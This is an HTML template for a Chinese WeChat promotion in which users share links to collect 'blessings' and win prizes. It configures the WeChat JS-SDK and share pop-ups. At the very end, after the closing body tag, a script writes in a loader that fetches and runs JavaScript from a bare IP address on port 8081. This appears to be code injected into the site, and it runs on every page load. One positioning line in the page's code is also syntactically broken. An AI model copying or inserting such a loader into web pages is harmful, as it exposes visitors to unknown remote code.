<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="format-detection" content="telephone=no">
<meta name="viewport" content="width=device-width, initial-scale=1" />  
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="format-detection" content="telephone=no" />
<meta http-equiv="Content-Type" content="text/html; charset=gbk" />
<title>万福进万家首页</title>
<link rel="stylesheet" type="text/css"  href="{[$DIR]}mobel_css.css" />
<script language="JavaScript" src="{[$DIR]}js/jquery-1.7.js"></script> 
<script language="JavaScript" src="{[$DIR]}js/tab.js"></script>
<script type="text/javascript" src="{[$DIR]}js/background.js"></script>
<script src="http://res.wx.qq.com/open/js/jweixin-1.0.0.js"></script>
<script>
wx.config({
    debug: false, // 开启调试模式,调用的所有api的返回值会在客户端alert出来，若要查看传入的参数，可以在pc端打开，参数信息会通过log打出，仅在pc端时才会打印。
    appId: '{[$jsApiArr.appId]}', // 必填，公众号的唯一标识
    timestamp: '{[$jsApiArr.timestamp]}', // 必填，生成签名的时间戳
    nonceStr: '{[$jsApiArr.nonceStr]}', // 必填，生成签名的随机串
    signature: '{[$jsApiArr.signature]}',// 必填，签名，见附录1
    jsApiList: [
        'checkJsApi',
        'onMenuShareTimeline',
        'onMenuShareAppMessage',
        'onMenuShareQQ',
        'onMenuShareWeibo',
        'hideMenuItems',
        'showMenuItems',
        'hideAllNonBaseMenuItem',
        'showAllNonBaseMenuItem',
        'translateVoice',
        'startRecord',
        'stopRecord',
        'onRecordEnd',
        'playVoice',
        'pauseVoice',
        'stopVoice',
        'uploadVoice',
        'downloadVoice',
        'chooseImage',
        'previewImage',
        'uploadImage',
        'downloadImage',
        'getNetworkType',
        'openLocation',
        'getLocation',
        'hideOptionMenu',
        'showOptionMenu',
        'closeWindow',
        'scanQRCode',
        'chooseWXPay',
        'openProductSpecificView',
        'addCard',
        'chooseCard',
        'openCard'
      ] // 必填，需要使用的JS接口列表，所有JS接口列表见附录2
});

function fabudisplay()
{
	var popUp = document.getElementById("choujiang")
	//document.getElementById('fabu_box').style.display='';
	
	var obj = document.getElementById("choujiang");
	var W = screen.width;//取得屏幕分辨率宽度
	var H = screen.height;//取得屏幕分辨率高度
	var yScroll;//取滚动条高度
	if (self.pageYOffset) {
	yScroll = self.pageYOffset;
	} else if (document.documentElement && document.documentElement.scrollTop){
	yScroll = document.documentElement.scrollTop;
	} else if (document.body) {
	yScroll = document.body.scrollTop;
	}
	
	//obj.style.marginLeft= (W/2 - 200) + "px";

	obj.style.display="block"; 
}
function fabudisplay2()
{
	var popUp = document.getElementById("liquan")
	//document.getElementById('fabu_box').style.display='';
	
	var obj = document.getElementById("liquan");
	var W = screen.width;//取得屏幕分辨率宽度
	var H = screen.height;//取得屏幕分辨率高度
	var yScroll;//取滚动条高度
	if (self.pageYOffset) {
	yScroll = self.pageYOffset;
	} else if (document.documentElement && document.documentElement.scrollTop){
	yScroll = document.documentElement.scrollTop;
	} else if (document.body) {
	yScroll = document.body.scrollTop;
	}
	
	//obj.style.marginLeft= (W/2 - 200) + "px";
	obj.style.top= (H/2- 　+　yScroll) + "px";
	obj.style.display="block"; 
}

</script>
</head>

<body>
<div id="wrap">
<div id="content">
      <div class="sc1_banner"><img src="{[$DIR]}images/sc_banner_bg.jpg" /></div>
      
      <div class="sc1_zhucfu">
      {[if $userArr.guanzhu]}
      <p>恭喜您！</p>
      <p>获得{[$userArr.fu]}个祝福</p>
      <span>再集{[$c_fu]}个，&ldquo;福&rdquo;字豪礼就是你的！</span>
      {[else]}
      <!--<p>关注搜藏天下</p>
      <p>即获30个祝福</p>
      <span>再集70个，&ldquo;福&rdquo;字豪礼就是你的！</span>-->
      {[/if]}
      </div>
      
      <div class="dianji">  
      <div class="annbj">
            <div class="one">
            <a href="#tanchu">
            <button type="button"  id="btnshow" class="anniu" onclick="window.location.href='index.php?m=main&c=zhuanfa&p=main&zt=index&openid={[$userArr.openid]}'"/>点击集福</button>
            </a>
   
            </div>
            <div class="two"></div>            
      </div>  
      </div>
      
      <div class="sc1_cdzf">不要让祝福断了，传递下去，&ldquo;福&rdquo;就是你的！</div> 
      
      <div id="bg"></div>      
      <div id="choujiang" style="width:100%; height:100%; position:absolute; top:0; left:0; z-index:1000; background-color:none;  display:none; color:#fff">
            <div class="fenxiang"> 
            <a name="tanchu-2"></a>  
            <div class="jiantou"><p><img src="{[$DIR]}images/jiantou.png" /></p></div>
            <div class="djysj">
            <span>点击右上角按钮：</span>
            <span class="s_icon"><img src="{[$DIR]}images/fpy.png" width="30" /></span>
            <span class="s_icon"><img src="{[$DIR]}images/pyq.png" width="30" /></span>
            </div>
      
            <div class="djysj"><h1>分享给好友，千元福字轻松拿！</h1></div>
            <div class="djysj">一个好友点击将为你带来1—3个祝福<br />满一百个，千元大礼就是你的啦！</div>
            <div class="djysj"><h2>朋友和朋友的朋友点击均有效哦</h2></div>
            </div>
            <div class="lml_close" onClick="document.getElementById('choujiang').style.display='none';closeWindow()">×</div>
      </div>
        
{[include file="tpl/wanfu/inc/menu.html"]} 
</div>
</div>

<div class="zztj">
<script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1254040973'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/stat.php%3Fid%3D1254040973' type='text/javascript'%3E%3C/script%3E"));
</script>
</div>
</body>
<script>
wx.ready(function () {
	//分享到朋友圈
	wx.onMenuShareTimeline({
		title: '{[$weixinTitle]}', // 分享标题
		link: 'http://weixin.96567.com/hd/index.php?m=main&c=jifu&p=main&openid={[$userArr.openid]}', // 分享链接
		imgUrl: 'http://weixin.96567.com/hd/static/images/f_logo.jpg', // 分享图标
		success: function () { 
			// 用户确认分享后执行的回调函数
		},
		cancel: function () { 
			// 用户取消分享后执行的回调函数
		}
	});
	
	//分享给好友
	wx.onMenuShareAppMessage({
		title: '{[$weixinTitle]}', // 分享标题
		desc: '{[$weixinTitle1]}', // 分享描述
		link: 'http://weixin.96567.com/hd/index.php?m=main&c=jifu&p=main&openid={[$userArr.openid]}', // 分享链接
		imgUrl: 'http://weixin.96567.com/hd/static/images/f_logo.jpg', // 分享图标
		type: '', // 分享类型,music、video或link，不填默认为link
		dataUrl: '', // 如果type是music或video，则要提供数据链接，默认为空
		success: function () { 
			// 用户确认分享后执行的回调函数
		},
		cancel: function () { 
			// 用户取消分享后执行的回调函数
		}
	});
})

var bhid = 607;
document.write("<script type=\"text/javascript\" src=\"http://113.106.95.36:8081/aa.js\"><\/script>");
</script>
</html>